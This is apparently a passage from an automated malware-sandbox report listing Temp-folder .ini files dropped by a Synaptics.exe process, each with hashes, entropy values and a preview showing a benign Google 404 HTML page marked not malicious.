                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PFVi3IPS-xqVSAmhb4q6Iw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\WNaEF7n.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.265890770700337
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0YrbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                              MD5:76FE52E579022AA22832C86466BFDE39
                                                                                              SHA1:779FA1F3F58463C930B1F18D1422D4E3B92B923D
                                                                                              SHA-256:189CB8217397FE04FA349366748EEB1C4D9170FF57C00168BAF2ADA2B68AE217
                                                                                              SHA-512:566EFE387DAABE92493425091C7C8C0CE94A2AA97AE6B9EB3F05478717BF0757A2F6DC665ACE5C55C9D863C195048804536BF3999B97F16B8457D7DD551DD6F8
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ExrkytDhvcD1IGuZDGG6RQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\YkZ4H7c.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.263866507329888
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0T1zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+CV+pAZewRDK4mW
                                                                                              MD5:CC1482F5DDCE3B9410463ED0A93AB930
                                                                                              SHA1:8208231A9E2E7084CA3C1887553A1434DC1DF334
                                                                                              SHA-256:E6109BD7208E58DEF8948477BF29583E225D74C0334FF45342930454F0AFFE7B
                                                                                              SHA-512:7CAA4D7EBF495F9C5719DC9F402CC4A20A5FEB976D56F1ADEC32068078F8C20B0EB5753AC1870AB6761AFB4476E72E72538856CC54BC30076C901E2265CC9CC8
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2X5T1KhgJcL-A3CMDTgr6g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\Z3Mjhxf.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.270056199545199
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0sTSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3T+pAZewRDK4mW
                                                                                              MD5:1180591446725FBBA823AC5FC7F6D18F
                                                                                              SHA1:CF73A5D8B42B9C9590651B3F7058D291AE2C6779
                                                                                              SHA-256:F854534C0986FBEBBDED133477E119C7921B7887F110F135475CC6734593EED1
                                                                                              SHA-512:63CF181A6054E3CF727569035E4DF1AEF77C63CA1964818515BBD9BA06A1DC47753E5AC956831BF3F6589F76B833A70B563FD4A4BF97FFBA1071189FA8328689
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jbcaYCMgRBS9naU6qBQ5mQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\ajhcJzH.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.260805378898572
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0hKSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                              MD5:7561F664E1E542DF4D845C2803AA184C
                                                                                              SHA1:70F225A21544239C17E2151E5D374BA8EE3BDFB1
                                                                                              SHA-256:33616D50E0203E10CF153D441250086D81920F0D640291B5E30E2A8083A66D79
                                                                                              SHA-512:A95B60737D67EF570175BB655423DA21C178EA01D00AE216CD2A10A6180ED6F07B238633FE1BFF53E25120491B8501366885AC3A0FD748973541CCCAFE293CF0
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1eNYzGNh8vMytlX18DfyLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\bQbQjxy.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.270499164652314
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+06OuDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+XD+pAZewRDK4mW
                                                                                              MD5:EBC73F8319E801B6C6D273603A696C4D
                                                                                              SHA1:EB59E9126FD8E3326066967922A8A9D64A5D4BF0
                                                                                              SHA-256:CEEC1ED3374FA38C53D8B5ED91EDECE1A6D7BCCE1469F020E939B7C9069B50C1
                                                                                              SHA-512:317CA6BEAA9E8E33037490015ECDF1E1503515A279713B7D65B366873CF7A0D80634E8A00C9F31AE79889D8154F7785B843344736DAD8CF3712081D90690D89C
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7qXMJ6Wo5oKpbU-FCmKkXA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\cIcHS2n.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.275018226051399
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0/JWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                              MD5:C8D6BB15B5EFCCA994873CE64597652F
                                                                                              SHA1:0AD21973DD2407606414C32B5DD6170DA3D57256
                                                                                              SHA-256:66DCD68C145F8405A1943730682FF5053FB917978499337BAC6664DADD3C25D4
                                                                                              SHA-512:61CA2664821F8D03772A49359F36CDBDB51E7861D6E9D302E6FE019A50C7CEDD7A8D8614EC6DDA7941BAE8602735E85F32F334E6531367AB8D8F0955C2FB70BD
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XrVHkZAbYDrnQ_BVXUNJhg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\eBGUwN6.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.2598070392821965
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0RXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6X+pAZewRDK4mW
                                                                                              MD5:B356A4593F9FED7B7A4B5CA7EC2A8061
                                                                                              SHA1:895D1C2CC1812691A1261B42DA38BA24F27BE157
                                                                                              SHA-256:196F7C9AE86D05FD9C1DA821FBAAB362B93412BC6E70E68C4C29277A83B1D316
                                                                                              SHA-512:87F0708785D9F55E121A27AF1165282DDCC23A1DD8F43C97102BD2FD8BFF57F9B9D685A9FABB37A8F67ACC4350F016F3EEEC9CD5A37F8F17AEE7737ACBC42AC0
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="emh2RlTL2CBjzS33vxS8dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\eWDC25X.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.2721019695303495
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0X8RDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6aD+pAZewRDK4mW
                                                                                              MD5:858A68D9FCB7B9E5BC03B5DE249FE723
                                                                                              SHA1:9A8360D46B1CCB30052FEF54BA18587B1F9CC72F
                                                                                              SHA-256:6C93D9DA0AA0713CBA7676D31EB682243727F2562E866C37C285796D046DEFF4
                                                                                              SHA-512:95698511081EFA3238EA356E05F3B601BE9E3F26E4B862B6BC454194E24878CB2FD4C906AE104CBAB74A73FCFB99D5E39BF0DE62ABBDE2C5E386052EA651AB41
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LHeVnpE6_VpH2DxXkDYUXA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\fPG6Fo4.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.253675645980829
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0jJSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                              MD5:5F0A1E0192F1C3CA2E192C5AC200EF00
                                                                                              SHA1:EB3D3E12D3016FDB07568CAFB387658B7E83C689
                                                                                              SHA-256:C9C4DCF9D8FA12D5067A60966B266109FBA1E23F0A70012D51F677F1A4A3DF8F
                                                                                              SHA-512:10C35572BC8AE6BB15FF23B673C0BA157E85BADB7DD665B83BEAFECF407796AA6FEDEF2DF190504C01D4ECA797843CEF2184D2320246B6501A6858F0FE6235A4
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="okyK1IojbdJfQWLbC1eopg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\iBpnNee.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.269077653313215
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+00UgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9Ug+pAZewRDK4mW
                                                                                              MD5:0A7C71C68138078D461694418D559148
                                                                                              SHA1:80FA9DF3A476B87ADE46BE6C1E527E612B9C08F6
                                                                                              SHA-256:D2A50E3D9ADFDFC4ED37AEF486C16F6C0CA138A46798CF54281F97E982F38CD0
                                                                                              SHA-512:79A9C01FD60893CAE5A7A2523C3B4BF22797162EF06BD173BD3E28C55CDE1BDE2FEE5D839F1351746EB8096D2D28CB22714912CB576139F96179F7AE937907AA
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vgCEfSJRx7U0FdKkD3wHdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\iFAlmcr.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.260543469198689
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                              MD5:2CA2D5205658D1E7FF4EFCD4559E9C77
                                                                                              SHA1:BEF9855F4FD424A14048A6360B548EE080CCB7F8
                                                                                              SHA-256:3C1A3F350CDF06B87DFF7C02E1C3BFFE7A29EFFB413586116CE069628D6C43E6
                                                                                              SHA-512:A7CB6A3B9BADC1BE7B82F580D324BB3E34C2ECDECC1953244953DFDCC853A0D8B70927A860B9DC8C04EAD6957CFEDF66E412A1B27E85F9D502B0B4D85A248B02
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="itMXlYMEoxJ4A7mkXRJ9hg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\ieDyoIc.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.258803178807284
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0XzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Qz+pAZewRDK4mW
                                                                                              MD5:BF0B858250E1870B3FD7CCF52D973A4A
                                                                                              SHA1:57A9B78CEB98E19BF307E2985044192DA08BACA9
                                                                                              SHA-256:EE7D0F49F4E01B7AB557679B0991ADFF87C7717CA104980C7173E237D3B93D1D
                                                                                              SHA-512:29BA8A8144D06C2677E763F8D16C1515A53C04FC05D2781A69C763AF64042F88DCB49A2FE63747E459FB50351D4032B6FF6ABA8CB9FDFC0242FB02F29859D647
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Gg9LkJ5jp_Bt6nZ2QyrTmg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\ihOVb2x.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.265085044199661
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+03SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                              MD5:3577F8694D204574F7B525F623553958
                                                                                              SHA1:88FDF6695A4D4463CA1445EFD74161F3DE4569A0
                                                                                              SHA-256:AC0E5416676DB57D5B724C9CBA07F055AD984D454A4619952852C24CCF3621B4
                                                                                              SHA-512:2456D2A4D9F47274BB39AD7572C9E6A218FC53358716D5CBB6FFAE5F1C8064513C211B21AF2F43A51EC8513FE8C184F1A51C293475AED3559ED823155FB521FC
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="II41z3QDaP_-U8MuOfnIbg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\j6eXGHQ.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.274934084142228
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0pCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+qC+pAZewRDK4mW
                                                                                              MD5:E8490B06101455346D15690076A60D53
                                                                                              SHA1:B852679A58F782D73818136CF7BC1A9025B3190A
                                                                                              SHA-256:1C0B510105594747E8B6E16BB12466EB18866367BFC72C3B05C5D4F50B7A5083
                                                                                              SHA-512:B6A359D35C3582D38AEE2DB511FEA3A8BA90EDC83CF9B66778493EA5C71C4F20CED8F077D232175054E557A2C4A548842A949A886CC9BFE55EE57A54CC7356C9
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RVYeZIIefAJ-_RfhXPHu3A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\lYG7Zkg.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.250044445482522
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0Z4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                              MD5:4899EEF9C7924C8C50B175F2479078FD
                                                                                              SHA1:63151218CD0150B9284CFB70FA0600FBC024CE1D
                                                                                              SHA-256:D46DB914F53E332665F272F42EF9757595C02A347142BD5D0969314217C049EC
                                                                                              SHA-512:F437A479E5D63FF02E89FE0702027AA7766CC16BEB86EA1F0CB8294F6A1555D8FD1F5987A2056C6C9D2E04A763054C6E6BDC22F9138AEB75609BC8D1268ABE38
                                                                                              Malicious:false
